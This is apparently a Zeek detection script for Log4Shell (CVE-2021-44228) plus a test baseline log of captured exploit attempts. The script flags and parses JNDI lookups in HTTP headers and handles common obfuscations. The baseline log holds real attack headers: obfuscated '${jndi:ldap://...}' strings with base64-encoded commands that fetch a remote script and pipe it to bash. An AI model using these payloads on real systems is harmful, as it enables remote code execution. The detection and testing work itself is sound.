# Headers: https://corelight.com/blog/simplifying-detection-of-log4shell
# LDAP: https://corelight.com/blog/detecting-the-log4j-exploit-via-zeek-and-ldap-traffic

@load base/frameworks/signatures

# LDAP-side detection: the signatures fire on the LDAP response carrying the
# Java naming reference; `signature_match` below turns them into notices.
@load-sigs ./ldap_java.sig

export {
	redef enum Notice::Type += {
		## Possible Log4j exploit CVE-2021-44228 exploit in header. Refer to
		## sub field for sample of payload, original_URI and list of server
		## headers.
		LOG4J_ATTEMPT_HEADER,

		## Possible Log4j exploit CVE-2021-44228 exploit, JAVA over LDAP. Refer
		## to sub field for sample of payload.
		LOG4J_LDAP_JAVA,

		## Reserved for a future "attempt followed by callback traffic"
		## notice; nothing in this script raises it yet (see the TODO in
		## http_header).
		LOG4J_SUCCESS
	};

	## Whether header matches are also written to the `log4j` log.
	option log = T;
	# redef'd when running tests with btest. Leave as `F`.
	option run_tests = F;

	## A set of target hosts(string) that should be ignored. Includes both IPs
	## and domains. The target host is the host parsed out of the payload
	## (PayloadParts$host), compared as an exact string.
	option ignorable_target_hosts: set[string] = {};

	## A set of originating hosts from known benign scanners that should be
	## ignored.
	option ignorable_orig_hosts: set[addr] = {};

	## A set of responding hosts from known benign scanners that should be
	## ignored.
	option ignorable_resp_hosts: set[addr] = {};

	# Try to normalize payloads to improve the chance of successfully retrieving
	# the payload information (see `normalize`).
	option try_normalize = T;

	## Stream ID of the `log4j` log; records are `Info`.
	redef enum Log::ID += { LOG };

	## File name of the `log4j` log.
	const log_path = "log4j" &redef;

	## Policy hook for the `log4j` log stream.
	global log_policy: Log::PolicyHook;
}

## Tag added to c$http$tags (visible in http.log) on every header match. It is
## applied before the ignorable_target_hosts check in http_header, so ignored
## targets are still tagged even though they raise no notice.
redef enum HTTP::Tags += {
	LOG4J_RCE
};

# Silence the default Signatures::Sensitive_Signature notice for the TCP LDAP
# signature; `signature_match` raises LOG4J_LDAP_JAVA for it instead. Note
# that the UDP signature name `signature_match` also accepts
# ("log4j_javaclassname_udp") is not listed here.
redef Signatures::actions += { ["log4j_javaclassname_tcp"] = Signatures::SIG_QUIET };

# One `log4j` log line per matching HTTP header, written from http_header.
type Info: record {
	ts: time &log;              ##< network_time() when the header was seen
	uid: string &log;           ##< connection UID (join key for http.log / conn.log)
	http_uri: string &log;      ##< request URI of the transaction, "" if unknown
	uri: string &log;           ##< payload URI (PayloadParts$uri), "-" if not parsed
	stem: string &log;          ##< payload host[:port] (PayloadParts$stem)
	target_host: string &log;   ##< payload host; compared against ignorable_target_hosts
	target_port: string &log;   ##< payload port as a string, "-" if absent
	method: string &log;        ##< HTTP method, "" if unknown
	is_orig: bool &log;         ##< T if the header came from the client
	name: string &log;          ##< header name
	value: string &log;         ##< header value, attacker-controlled and logged verbatim
	matched_name: bool &log;    ##< exploit_pattern matched the header name
	matched_value: bool &log;   ##< exploit_pattern matched the header value
};

# Pieces parsed out of a `${jndi:<scheme>://host:port/path}` style payload by
# `parse_payload`; each is "-" when it could not be parsed.
type PayloadParts: record {
	uri: string;    ##< host:port/path (after "//", up to "}")
	stem: string;   ##< host:port (uri up to the first "/")
	host: string;   ##< host part of the stem
	port_: string;  ##< port part of the stem, "-" if none
};

# Very general, FPs expected but we're casting a wide net intentionally.
# Approach:
# Match ${
# unless it's ${@ (php junk)
# and only if it has a : in the middle and
# and ending brace.
# See test cases in zeek_init() for what we consider to be a TP/FP.
# Applied to both header names and values in http_header; the is_ascii filter
# that drops binary matches lives there, not in the pattern.
global exploit_pattern: pattern = /\$\{[^@][^}]+:[^}]+\}/;

# Stack used for `normalize`. Shouldn't be used outside of that function.
# It is module-global, so `normalize` must leave it empty (it calls
# clear_stack() before returning).
global stack: vector of string;

# Top of the stack, or "" when empty.
function peek(): string
	{
	if ( |stack| == 0 )
		return "";
	else
		return stack[|stack|-1];
	}

# Remove and return the top of the stack, or "" when empty.
function pop(): string
	{
	if ( |stack| == 0 )
		return "";
	local x = peek();
	stack = stack[0:|stack|-1];
	return x;
	}

# Push one element (a single character in practice).
function push(x: string)
	{
	stack += x;
	}

# Reset the stack to empty.
function clear_stack()
	{
	stack = vector();
	}

# Attempts to normalize log4j payload to remove most common obfuscations. There
# are effectively an infinite number of ways to do this, so don't expect it to
# cover everything.
# See tests in `zeek_init()` to understand what it handles.
#
# Algorithm works as follows:
#
# "$" and "{" are pushed onto the stack when encountered.
# Set a flag to show we have seen the first "$" "{" set.
# If we are on our second+ set of "$" "{", start ignoring characters
# If we see a ":" while ignoring, we have passed the function portion and should stop ignoring.
# When we hit a "}", pop the previous "{" and "$" off the stack. If the stack is
# now empty, this was the first instance (i.e., `${jndi...`) and it should be
# preserved, otherwise, remove it.
#
# payload: attacker-controlled header name or value (already matched by
#          exploit_pattern by the time parse_payload calls this).
# Returns the payload with nested `${fn:x}` lookups collapsed to `x`, e.g.
# `${jndi:${lower:l}dap://h}` -> `${jndi:ldap://h}` and
# `${${::-j}ndi:...}` -> `${jndi:...}`. Best effort only: input it does not
# understand comes back partially rewritten rather than unchanged.
function normalize(payload: string): string
	{
	# Replace default substitution string with normal formatting string, i.e., ${::-j} -> ${:j}
	payload = gsub(payload, /::\-/, ":");
	# Byte offsets of `payload` that will be dropped from the result.
	local to_remove: set[count];
	local i = 0;
	# T while skipping a nested lookup's function name (everything up to its ":").
	local ignoring = F;
	# T once the outermost "${" has been seen.
	local saw_first = F;
	while ( i != |payload| )
		{
		local c = payload[i];
		switch ( c )
			{
			case "$":
				push(c);
				break;
			case "{":
				# Only a "{" directly after "$" is tracked on the stack ...
				if ( peek() == "$" )
					push(c);
				# ... but the first/nested bookkeeping runs for any "{", so a
				# bare "{" after the first lookup still removes the byte before
				# it (i-1 is safe: saw_first implies an earlier "{") and starts
				# ignoring.
				if ( !saw_first )
					{
					saw_first = T;
					}
				else
					{
					# Add previous "$"
					add to_remove[i-1];
					ignoring = T;
					}
				break;
			case ":":
				if ( ignoring )
					{
					# End of the nested lookup's function name; keep what follows it.
					add to_remove[i];
					ignoring = F;
					}
				break;
			case "}":
				local open_brace = pop();
				local dollar = pop();
				# We only want to remove internal ones
				if ( dollar == "$" && open_brace == "{" && |stack| > 0 )
					add to_remove[i];
				break;
			}

		if ( ignoring )
			add to_remove[i];
		++i;
		}

	# Rebuild the string from the bytes that survived.
	local new_payload: vector of string;
	i = 0;
	while ( i != |payload| )
		{
		if ( i !in to_remove )
			new_payload += payload[i];
		++i;
		}
	# `stack` is module-global state: leave it empty for the next call.
	clear_stack();
	return join_string_vec(new_payload, "");
	}

# If split
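# doesn't return the expected number of indices, return the default "-"
#
# s:       string to split
# p:       pattern to split on (first occurrence only)
# idx:     index of the piece wanted (0 = before the split, 1 = after it)
# missing: returned when the split yields fewer than idx+1 pieces
function safe_split1_w_default(s: string, p: pattern, idx: count, missing: string &default="-"): string
	{
	local tmp = split_string1(s, p);
	if ( |tmp| > idx )
		return tmp[idx];
	else
		return missing;
	}

# Assumes `name` or `value` string passed as `s` has the structure:
# ${jndi:ldap://payload_host:payload_port/path} for the payload. Many examples
# of more complicated obfuscation exist. If the structure is different, fill
# missing fields with "-" so other structures in the wild can be explored in the
# logs. For example, Binary Edge are using the following type of obfuscation:
# ...value='${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}'
#
# `s` is attacker-controlled, and `host` is what ignorable_target_hosts is
# compared against, so the host is taken from inside the matched `${...:...}`
# lookup rather than from the last "//" anywhere in the header: with the
# last-"//" approach, trailing text such as
# `${jndi:ldap://evil:1389/x}//benign.example` set target_host to
# "benign.example". When no lookup can be matched (normalization did not fully
# undo the obfuscation), the last-"//"-segment behaviour is kept as a fallback.
# Bracketed IPv6 literals ("[2001:db8::1]:1389") are split after the "]" so
# the host is "2001:db8::1" rather than "[2001".
#
# Returns a PayloadParts; every field is "-" when it could not be parsed.
function parse_payload(s: string): PayloadParts
	{
	if ( try_normalize )
		s = normalize(s);

	local last: string = "-";
	local found = F;
	local m = match_pattern(s, exploit_pattern);
	if ( m$matched )
		{
		# First "//" inside the lookup, not the last one in the whole header.
		local inner = split_string1(m$str, /\/\//);
		if ( |inner| > 1 )
			{
			last = inner[1];
			found = T;
			}
		}
	if ( ! found )
		{
		# Fallback: last "//" segment of the (normalized) string.
		local tmp = split_string(s, /\/\//);
		if ( |tmp| > 0 )
			last = tmp[(|tmp| - 1)];
		}

	local payload_uri = safe_split1_w_default(last, /\}/, 0);
	local payload_stem = safe_split1_w_default(payload_uri, /\//, 0);
	local payload_host: string;
	local payload_port: string;

	# A bracketed IPv6 literal has ":" inside the host, so splitting the stem
	# on its first ":" would give host="[2001" and port="db8::1]:1389".
	local close_pos = ( |payload_stem| > 0 && payload_stem[0] == "[" ) ? strstr(payload_stem, "]") : 0;
	if ( close_pos > 0 )
		{
		# Host is the text between the brackets ("[]" yields "-").
		payload_host = close_pos > 2 ? sub_bytes(payload_stem, 2, close_pos - 2) : "-";
		# Port, if any, follows the ":" after the closing bracket.
		local after_bracket = sub_bytes(payload_stem, close_pos + 1, |payload_stem| - close_pos);
		payload_port = safe_split1_w_default(after_bracket, /\:/, 1);
		}
	else
		{
		payload_host = safe_split1_w_default(payload_stem, /\:/, 0);
		payload_port = safe_split1_w_default(payload_stem, /\:/, 1);
		}

	return PayloadParts($uri=payload_uri, $stem=payload_stem, $host=payload_host, $port_=payload_port);
	}

# Header detection (LOG4J_ATTEMPT_HEADER). Runs on every HTTP header in both
# directions; a header whose name or value matches exploit_pattern is tagged,
# noticed and (if `log` is T) written to the `log4j` log. The LOG4J_RCE tag is
# applied before the ignorable_target_hosts check, so ignored targets are
# still tagged in http.log.
event http_header(c: connection, is_orig: bool, name: string, value: string)
	{
	# Endpoint ignore-lists short-circuit everything, including the tag.
	if ( c$id$orig_h in ignorable_orig_hosts )
		return;
	if ( c$id$resp_h in ignorable_resp_hosts )
		return;
	# Focus is mainly on client headers, but not filtering right now to explore interesting cases in the wild
	# if (!is_orig)
	# 	return;
	# Focus is mainly on value of header, but adding 'name' to explore what is being used in the wild
	local matched_name =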
exploit_pattern in name; 238 | local matched_value = exploit_pattern in value; 239 | local http_uri: string = ""; 240 | local http_method: string = ""; 241 | 242 | # Handle potentially missing fields 243 | if ( c$http?$uri ) 244 | http_uri = c$http$uri; 245 | if ( c$http?$method ) 246 | http_method = c$http$method; 247 | 248 | # Ignore matches that contain binary goop. This was a large contributor to 249 | # false positives. 250 | if ( matched_name && !is_ascii(name) ) 251 | return; 252 | if ( matched_value && !is_ascii(value) ) 253 | return; 254 | 255 | if ( !matched_name && !matched_value ) 256 | return; 257 | 258 | add c$http$tags[LOG4J_RCE]; 259 | 260 | local payload: PayloadParts; 261 | local info: Info; 262 | 263 | # TODO: add to a clusterized set for watching of subsequent traffic (LOG4J_SUCCESS notice). 264 | if ( matched_name ) 265 | { 266 | payload = parse_payload(name); 267 | if ( payload$host in ignorable_target_hosts ) 268 | return; 269 | info = Info($ts=network_time(), $uid=c$uid, $http_uri=http_uri, $uri=payload$uri, $stem=payload$stem, $target_host=payload$host, $target_port=payload$port_, $method=http_method, $is_orig=is_orig, $name=name, $value=value, $matched_name=matched_name, $matched_value=matched_value); 270 | NOTICE([$note=LOG4J_ATTEMPT_HEADER, 271 | $conn=c, 272 | $identifier=cat(c$id$orig_h,c$id$resp_h,c$id$resp_p,cat(name,value)), 273 | # $suppress_for=3600sec, 274 | $msg=fmt("Possible Log4j exploit CVE-2021-44228 exploit in header. 
Refer to sub field for sample of payload, original_URI and list of server headers"), 275 | $sub=fmt("uri='%s', payload_uri=%s, payload_stem=%s, payload_host=%s, payload_port=%s, method=%s, is_orig=%s, header name='%s', header value='%s' ", http_uri, payload$uri, payload$stem, payload$host, payload$port_, http_method, is_orig, name, value)]); 276 | if ( log ) 277 | Log::write(LOG, info); 278 | } 279 | if ( matched_value ) 280 | { 281 | payload = parse_payload(value); 282 | if ( payload$host in ignorable_target_hosts ) 283 | return; 284 | info = Info($ts=network_time(), $uid=c$uid, $http_uri=http_uri, $uri=payload$uri, $stem=payload$stem, $target_host=payload$host, $target_port=payload$port_, $method=http_method, $is_orig=is_orig, $name=name, $value=value, $matched_name=matched_name, $matched_value=matched_value); 285 | NOTICE([$note=LOG4J_ATTEMPT_HEADER, 286 | $conn=c, 287 | $identifier=cat(c$id$orig_h,c$id$resp_h,c$id$resp_p,cat(name,value)), 288 | # $suppress_for=3600sec, 289 | $msg=fmt("Possible Log4j exploit CVE-2021-44228 exploit in header. Refer to sub field for sample of payload, original_URI and list of server headers"), 290 | $sub=fmt("uri='%s', payload_uri=%s, payload_stem=%s, payload_host=%s, payload_port=%s, method=%s, is_orig=%s, header name='%s', header value='%s' ", http_uri, payload$uri, payload$stem, payload$host, payload$port_, http_method, is_orig, name, value)]); 291 | if ( log ) 292 | Log::write(LOG, info); 293 | } 294 | } 295 | 296 | event signature_match(state: signature_state, msg: string, data: string) 297 | { 298 | if ( !(msg == "log4j_javaclassname_udp" || msg == "log4j_javaclassname_tcp") ) 299 | return; 300 | 301 | NOTICE([$note=LOG4J_LDAP_JAVA, 302 | $conn=state$conn, 303 | $identifier=cat(state$conn$id$orig_h,state$conn$id$resp_h,state$conn$id$resp_p), 304 | # $suppress_for=3600sec, 305 | $msg=fmt("Possible Log4j exploit CVE-2021-44228 exploit, JAVA over LDAP. 
Refer to sub field for sample of payload."), 306 | $sub=data]); 307 | } 308 | 309 | event zeek_init() &priority=5 310 | { 311 | Log::create_stream(CVE_2021_44228::LOG, [$columns=Info, $path=log_path, $policy=log_policy]); 312 | } 313 | -------------------------------------------------------------------------------- /testing/Baseline/log4j.2021-12-11-thru-13-server-activity-with-log4j-attempts/notice.log: -------------------------------------------------------------------------------- 1 | ### BTest baseline data generated by btest-diff. Do not edit. Use "btest -U/-u" to update. Requires BTest >= 0.63. 2 | #separator \x09 3 | #set_separator , 4 | #empty_field (empty) 5 | #unset_field - 6 | #path notice 7 | #open XXXX-XX-XX-XX-XX-XX 8 | #fields ts uid id.orig_h id.orig_p id.resp_h id.resp_p fuid file_mime_type file_desc proto note msg sub src dst p n peer_descr actions email_dest suppress_for remote_location.country_code remote_location.region remote_location.city remote_location.latitude remote_location.longitude 9 | #types time string addr port addr port string string string enum enum string string addr addr port count string set[enum] set[string] interval string string string double double 10 | XXXXXXXXXX.XXXXXX Ce8sjQ1yXYbarn3Mv 45.137.21.9 38790 198.71.247.91 80 - - - tcp CVE_2021_44228::LOG4J_ATTEMPT_HEADER Possible Log4j exploit CVE-2021-44228 exploit in header. 
Refer to sub field for sample of payload, original_URI and list of server headers uri='/', payload_uri=45.137.21.9:1389/Basic/Command/Base64/d2dldCBodHRwOi8vNjIuMjEwLjEzMC4yNTAvbGguc2g7Y2htb2QgK3ggbGguc2g7Li9saC5zaA==, payload_stem=45.137.21.9:1389, payload_host=45.137.21.9, payload_port=1389, method=POST, is_orig=T, header name='USER-AGENT', header value='${jndi:ldap://45.137.21.9:1389/Basic/Command/Base64/d2dldCBodHRwOi8vNjIuMjEwLjEzMC4yNTAvbGguc2g7Y2htb2QgK3ggbGguc2g7Li9saC5zaA==}' 45.137.21.9 198.71.247.91 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 11 | XXXXXXXXXX.XXXXXX CWABgH2sHBQWCtrcji 161.35.155.230 36182 198.71.247.91 80 - - - tcp CVE_2021_44228::LOG4J_ATTEMPT_HEADER Possible Log4j exploit CVE-2021-44228 exploit in header. Refer to sub field for sample of payload, original_URI and list of server headers uri='/', payload_uri=world80.log4j.binaryedge.io:80/callback, payload_stem=world80.log4j.binaryedge.io:80, payload_host=world80.log4j.binaryedge.io, payload_port=80, method=GET, is_orig=T, header name='USER-AGENT', header value='${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/callback}' 161.35.155.230 198.71.247.91 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 12 | XXXXXXXXXX.XXXXXX CJUPx43GdTZtHo6Kme 128.199.15.215 49114 198.71.247.91 80 - - - tcp CVE_2021_44228::LOG4J_ATTEMPT_HEADER Possible Log4j exploit CVE-2021-44228 exploit in header. 
Refer to sub field for sample of payload, original_URI and list of server headers uri='/', payload_uri=http80useragent.kryptoslogic-cve-2021-44228.com/http80useragent, payload_stem=http80useragent.kryptoslogic-cve-2021-44228.com, payload_host=http80useragent.kryptoslogic-cve-2021-44228.com, payload_port=-, method=GET, is_orig=T, header name='USER-AGENT', header value='${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228.com/http80useragent}' 128.199.15.215 198.71.247.91 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 13 | XXXXXXXXXX.XXXXXX CTeHl91o8uGsNqqw3d 45.155.205.233 39692 198.71.247.91 80 - - - tcp CVE_2021_44228::LOG4J_ATTEMPT_HEADER Possible Log4j exploit CVE-2021-44228 exploit in header. Refer to sub field for sample of payload, original_URI and list of server headers uri='/?x=${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xOTguNzEuMjQ3LjkxOjgwfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzE5OC43MS4yNDcuOTE6ODApfGJhc2g=}', payload_uri=45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xOTguNzEuMjQ3LjkxOjgwfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzE5OC43MS4yNDcuOTE6ODApfGJhc2g=, payload_stem=45.155.205.233:12344, payload_host=45.155.205.233, payload_port=12344, method=GET, is_orig=T, header name='USER-AGENT', header value='${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xOTguNzEuMjQ3LjkxOjgwfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzE5OC43MS4yNDcuOTE6ODApfGJhc2g=}' 45.155.205.233 198.71.247.91 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 14 | XXXXXXXXXX.XXXXXX CTeHl91o8uGsNqqw3d 45.155.205.233 39692 198.71.247.91 80 - - - tcp CVE_2021_44228::LOG4J_ATTEMPT_HEADER Possible Log4j exploit CVE-2021-44228 exploit in header. 
Refer to sub field for sample of payload, original_URI and list of server headers uri='/?x=${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xOTguNzEuMjQ3LjkxOjgwfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzE5OC43MS4yNDcuOTE6ODApfGJhc2g=}', payload_uri=45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xOTguNzEuMjQ3LjkxOjgwfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzE5OC43MS4yNDcuOTE6ODApfGJhc2g=, payload_stem=45.155.205.233:12344, payload_host=45.155.205.233, payload_port=12344, method=GET, is_orig=T, header name='REFERER', header value='${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xOTguNzEuMjQ3LjkxOjgwfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzE5OC43MS4yNDcuOTE6ODApfGJhc2g=}' 45.155.205.233 198.71.247.91 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 15 | XXXXXXXXXX.XXXXXX C3iNyP3r3txhrkusil 177.185.117.129 41810 198.71.247.91 80 - - - tcp CVE_2021_44228::LOG4J_ATTEMPT_HEADER Possible Log4j exploit CVE-2021-44228 exploit in header. Refer to sub field for sample of payload, original_URI and list of server headers uri='/', payload_uri=45.83.193.150:1389/Exploit, payload_stem=45.83.193.150:1389, payload_host=45.83.193.150, payload_port=1389, method=GET, is_orig=T, header name='AUTHORIZATION', header value='Bearer ${jndi:ldap://45.83.193.150:1389/Exploit}' 177.185.117.129 198.71.247.91 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 16 | XXXXXXXXXX.XXXXXX CNqMer2JIgepG2LRIj 177.185.117.129 42022 198.71.247.91 80 - - - tcp CVE_2021_44228::LOG4J_ATTEMPT_HEADER Possible Log4j exploit CVE-2021-44228 exploit in header. 
Refer to sub field for sample of payload, original_URI and list of server headers uri='/', payload_uri=45.83.193.150:1389/Exploit, payload_stem=45.83.193.150:1389, payload_host=45.83.193.150, payload_port=1389, method=GET, is_orig=T, header name='AUTHORIZATION', header value='Oauth ${jndi:ldap://45.83.193.150:1389/Exploit}' 177.185.117.129 198.71.247.91 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 17 | XXXXXXXXXX.XXXXXX CRD4FB4Mn942lBA8W4 177.185.117.129 42246 198.71.247.91 80 - - - tcp CVE_2021_44228::LOG4J_ATTEMPT_HEADER Possible Log4j exploit CVE-2021-44228 exploit in header. Refer to sub field for sample of payload, original_URI and list of server headers uri='/', payload_uri=45.83.193.150:1389/Exploit, payload_stem=45.83.193.150:1389, payload_host=45.83.193.150, payload_port=1389, method=GET, is_orig=T, header name='AUTHORIZATION', header value='Token ${jndi:ldap://45.83.193.150:1389/Exploit}' 177.185.117.129 198.71.247.91 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 18 | XXXXXXXXXX.XXXXXX CUWDAG4qFmT1HEY77i 177.185.117.129 42452 198.71.247.91 80 - - - tcp CVE_2021_44228::LOG4J_ATTEMPT_HEADER Possible Log4j exploit CVE-2021-44228 exploit in header. Refer to sub field for sample of payload, original_URI and list of server headers uri='/', payload_uri=45.83.193.150:1389/Exploit, payload_stem=45.83.193.150:1389, payload_host=45.83.193.150, payload_port=1389, method=GET, is_orig=T, header name='AUTHORIZATION', header value='Basic ${jndi:ldap://45.83.193.150:1389/Exploit}' 177.185.117.129 198.71.247.91 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 19 | XXXXXXXXXX.XXXXXX CqmznHcjLQcO8nK15 61.175.202.154 33476 198.71.247.91 80 - - - tcp CVE_2021_44228::LOG4J_ATTEMPT_HEADER Possible Log4j exploit CVE-2021-44228 exploit in header. 
Refer to sub field for sample of payload, original_URI and list of server headers uri='/', payload_uri=45.83.193.150:1389/Exploit, payload_stem=45.83.193.150:1389, payload_host=45.83.193.150, payload_port=1389, method=GET, is_orig=T, header name='AUTHORIZATION', header value='Bearer ${jndi:ldap://45.83.193.150:1389/Exploit}' 61.175.202.154 198.71.247.91 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 20 | XXXXXXXXXX.XXXXXX CBS2ml4xq0Sr6BKUyh 61.175.202.154 33532 198.71.247.91 80 - - - tcp CVE_2021_44228::LOG4J_ATTEMPT_HEADER Possible Log4j exploit CVE-2021-44228 exploit in header. Refer to sub field for sample of payload, original_URI and list of server headers uri='/', payload_uri=45.83.193.150:1389/Exploit, payload_stem=45.83.193.150:1389, payload_host=45.83.193.150, payload_port=1389, method=GET, is_orig=T, header name='AUTHORIZATION', header value='Oauth ${jndi:ldap://45.83.193.150:1389/Exploit}' 61.175.202.154 198.71.247.91 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 21 | XXXXXXXXXX.XXXXXX CTCORvVQk0WrEaVZe 61.175.202.154 33602 198.71.247.91 80 - - - tcp CVE_2021_44228::LOG4J_ATTEMPT_HEADER Possible Log4j exploit CVE-2021-44228 exploit in header. Refer to sub field for sample of payload, original_URI and list of server headers uri='/', payload_uri=45.83.193.150:1389/Exploit, payload_stem=45.83.193.150:1389, payload_host=45.83.193.150, payload_port=1389, method=GET, is_orig=T, header name='AUTHORIZATION', header value='Token ${jndi:ldap://45.83.193.150:1389/Exploit}' 61.175.202.154 198.71.247.91 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 22 | XXXXXXXXXX.XXXXXX C10EIo4giI3Hr1NPr 61.175.202.154 33652 198.71.247.91 80 - - - tcp CVE_2021_44228::LOG4J_ATTEMPT_HEADER Possible Log4j exploit CVE-2021-44228 exploit in header. 
Refer to sub field for sample of payload, original_URI and list of server headers uri='/', payload_uri=45.83.193.150:1389/Exploit, payload_stem=45.83.193.150:1389, payload_host=45.83.193.150, payload_port=1389, method=GET, is_orig=T, header name='AUTHORIZATION', header value='Basic ${jndi:ldap://45.83.193.150:1389/Exploit}' 61.175.202.154 198.71.247.91 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 23 | XXXXXXXXXX.XXXXXX Cb56ei397sP6ZSa0Ia 175.6.210.66 41090 198.71.247.91 80 - - - tcp CVE_2021_44228::LOG4J_ATTEMPT_HEADER Possible Log4j exploit CVE-2021-44228 exploit in header. Refer to sub field for sample of payload, original_URI and list of server headers uri='/', payload_uri=45.83.193.150:1389/Exploit, payload_stem=45.83.193.150:1389, payload_host=45.83.193.150, payload_port=1389, method=GET, is_orig=T, header name='AUTHORIZATION', header value='Bearer ${jndi:ldap://45.83.193.150:1389/Exploit}' 175.6.210.66 198.71.247.91 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 24 | XXXXXXXXXX.XXXXXX C3lb3YcCzOtqhGWug 175.6.210.66 41158 198.71.247.91 80 - - - tcp CVE_2021_44228::LOG4J_ATTEMPT_HEADER Possible Log4j exploit CVE-2021-44228 exploit in header. Refer to sub field for sample of payload, original_URI and list of server headers uri='/', payload_uri=45.83.193.150:1389/Exploit, payload_stem=45.83.193.150:1389, payload_host=45.83.193.150, payload_port=1389, method=GET, is_orig=T, header name='AUTHORIZATION', header value='Oauth ${jndi:ldap://45.83.193.150:1389/Exploit}' 175.6.210.66 198.71.247.91 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 25 | XXXXXXXXXX.XXXXXX CUgYdV2cQ5dBBKFfza 175.6.210.66 41240 198.71.247.91 80 - - - tcp CVE_2021_44228::LOG4J_ATTEMPT_HEADER Possible Log4j exploit CVE-2021-44228 exploit in header. 
Refer to sub field for sample of payload, original_URI and list of server headers uri='/', payload_uri=45.83.193.150:1389/Exploit, payload_stem=45.83.193.150:1389, payload_host=45.83.193.150, payload_port=1389, method=GET, is_orig=T, header name='AUTHORIZATION', header value='Token ${jndi:ldap://45.83.193.150:1389/Exploit}' 175.6.210.66 198.71.247.91 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 26 | XXXXXXXXXX.XXXXXX C7lU5N1o9eBQpPLyg 175.6.210.66 41318 198.71.247.91 80 - - - tcp CVE_2021_44228::LOG4J_ATTEMPT_HEADER Possible Log4j exploit CVE-2021-44228 exploit in header. Refer to sub field for sample of payload, original_URI and list of server headers uri='/', payload_uri=45.83.193.150:1389/Exploit, payload_stem=45.83.193.150:1389, payload_host=45.83.193.150, payload_port=1389, method=GET, is_orig=T, header name='AUTHORIZATION', header value='Basic ${jndi:ldap://45.83.193.150:1389/Exploit}' 175.6.210.66 198.71.247.91 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 27 | XXXXXXXXXX.XXXXXX Cly4EX21eC8Jvctww3 45.83.65.162 62270 198.71.247.91 80 - - - tcp CVE_2021_44228::LOG4J_ATTEMPT_HEADER Possible Log4j exploit CVE-2021-44228 exploit in header. Refer to sub field for sample of payload, original_URI and list of server headers uri='/${jndi:dns://45.83.64.1/securityscan-http80}', payload_uri=45.83.64.1/securityscan-http80, payload_stem=45.83.64.1, payload_host=45.83.64.1, payload_port=-, method=GET, is_orig=T, header name='USER-AGENT', header value='${jndi:dns://45.83.64.1/securityscan-http80}' 45.83.65.162 198.71.247.91 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 28 | XXXXXXXXXX.XXXXXX Cly4EX21eC8Jvctww3 45.83.65.162 62270 198.71.247.91 80 - - - tcp CVE_2021_44228::LOG4J_ATTEMPT_HEADER Possible Log4j exploit CVE-2021-44228 exploit in header. 
Refer to sub field for sample of payload, original_URI and list of server headers uri='/${jndi:dns://45.83.64.1/securityscan-http80}', payload_uri=45.83.64.1/securityscan-http80, payload_stem=45.83.64.1, payload_host=45.83.64.1, payload_port=-, method=GET, is_orig=T, header name='REFERER', header value='${jndi:dns://45.83.64.1/securityscan-http80}' 45.83.65.162 198.71.247.91 80 - - Notice::ACTION_LOG (empty) 360XXXXXXXXXX.XXXXXX - - - - - 29 | XXXXXXXXXX.XXXXXX Cly4EX21eC8Jvctww3 45.83.65.162 62270 198.71.247.91 80 - - - tcp CVE_2021_44228::LOG4J_ATTEMPT_HEADER Possible Log4j exploit CVE-2021-44228 exploit in header. Refer to sub field for sample of payload, original_URI and list of server headers uri='/${jndi:dns://45.83.64.1/securityscan-http80}', payload_uri=45.83.64.1/securityscan-http80, payload_stem=45.83.64.1, payload_host=45.83.64.1, payload_port=-, method=GET, is_orig=T, header name='X-API-VERSION', header value='${jndi:dns://45.83.64.1/securityscan-http80}' 45.83.65.162 198.71.247.91 80 - - Notice::ACTION_LOG (empty) 